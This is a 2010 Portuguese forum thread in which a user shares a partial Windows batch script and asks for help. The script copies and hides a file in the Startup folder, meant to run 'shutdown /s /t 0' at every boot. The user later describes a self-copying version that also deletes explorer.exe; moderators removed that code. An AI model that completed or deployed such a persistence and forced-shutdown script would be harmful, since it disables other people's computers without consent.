[ RESOLVIDO ] Batch Script < Duvida Crusial >

3 respostas
V

É o seguinte pessoal :roll:
Estava entediado com java ontem (sem cmd) e fui fazer um batch script.
Mas me deparei com a ausência de um comando e algumas duvidas minhas... quem sabe é só ingenuidade da minha parte. :?
Mas enfim, ai segue o "code" inacabado.

@echo off

set winxp=C:\Documents and Settings\All Users\Menu Iniciar\Programas\Inicializar\
set arquivocopiar=C:WINDOWS\comsetup.log

cd\

if exist C:\WINDOWS\explorer.exe (goto XP)

:XP
copy "%arquivocopiar%" "%winxp%" 
ren "%winxp%comsetup.log" "lol.bat"
attrib "%winxp%lol.bat" +h

pause

Eu não conheço nenhum comando para criar um arquivo, por isso copiei e renomeei um, gostaria de saber se existe esse comando.
Outra coisa, preciso de algum comando que edite o conteúdo de um arquivo. <- é o que eu mais preciso.
E por fim, se puderem me informar o diretório da pasta inicializar no windows 7 e no vista, ficarei grato, pois então meu code ficará do tipo global.

Minha intenção pe colocar no conteúdo desse arquivo, é um belo "shutdown /s /t 0" :lol:
Só falta uma linha... :roll:
Desde já agradeço a ajuda.

3 Respostas

J

Vamos esclarecer umas coisas:

1. Não existe linguagem DOS, o que existe é o batch script, que não é uma linguagem.
  1. Esses scripts não tem acesso ao sistema operacional, sendo necessários programas como o copy ou cp(sistemas unix) para realizar tarefas.

2. O shell script(sistemas unix) ou bash scripts são mais robustos que seus similares win ou dos.

A fonte acima na wiki pode ajudar bastante com sua tarefa.

ViniGodoy

Se você quiser fazer coisas mais poderosas, pode usar alternativas ao shell comum como o power shell e cygwin.

V

Ah, mal pela “linguagem DOS” é que realmente não sei muito sobre o assunto. Mas acho que já consegui o que eu queria.
Ele faz uma copia de si mesmo para o inicializar, desligando o computador e excluir o explorer. Não testei ainda. 8)

[SCRIPT MALWARE REMOVIDO PELA MODERAÇÃO]

Alguem executa isso pra testar? -nn :lol:
Vlw pela ajuda ! Ah, e gostaria de saber, por exemplo, usar isso :

cd C:\Documents and Settings\*\Menu Iniciar\Programas\Inicializar\

ou do tipo…

cd C:\Documents and Settings\%user%\Menu Iniciar\Programas\Inicializar\

Claro, que isso não funciona, mas gostaria de saber se tem um jeito, dele interpretar, para entrar na pasta do usuário… com isso ajudaria muito. :?

Criado 9 de julho de 2010
Ultima resposta 9 de jul. de 2010
Respostas 3
Participantes 3